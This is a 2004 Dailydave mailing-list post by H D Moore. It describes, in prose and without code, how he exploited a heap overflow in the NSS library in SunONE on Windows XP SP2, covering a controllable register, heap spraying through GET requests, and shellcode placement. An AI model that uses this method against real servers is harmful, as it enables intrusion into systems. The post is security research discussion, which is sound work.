Re: quick notes

[H D Moore <hdm-daily-dave () digitaloffense net>]

On Friday 27 August 2004 13:27, Dave Aitel wrote:
> In addition to having the NSS heap overflow working against Windows XP
> SP2 (just to say that it can be done, not that people are running
> SunONE on Windows), 
Working on XP SP2 here as well. Using a request of 1024 bytes (256 * ret) 
I was able to hit a "call [edx+0x44]" where edx is controllable. This is 
actually preferable to write-what-where, especially when the target has 
heap cookies. The nice thing about SunONE is that the server will restart 
itself for you...So if you don't get it the first time, try, try again.

The tricky part of this exploit is determining a static address to use for 
the value of edx. This register needs to point to a pointer of your 
shellcode. It is possible to load arbitrary amounts of data into the heap 
of the remote process through GET requests with a Content-Length set. 
Using a handful of connections, each sending about 65k, I was able to 
reliably place and return to shellcode. If your return address doubles as 
nop-like instruction, it makes things much easier, since you can simply 
append your shellcode to the end of each 65k data block and let execution 
slide right through. Of course, this depends on being able to get data 
into an address which will become a valid nop-like instruction no matter 
what offset into it is hit. Anywho, Metasploit module will be available 
sometime in the next week or two, moving sucks :/

Dave, are you using this vector to gain eip, or have you found another way 
that is easier/more reliable? The fact that SSLv2 ciphers are not enabled 
by default drops the value of this bug quite a bit.

-HD
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave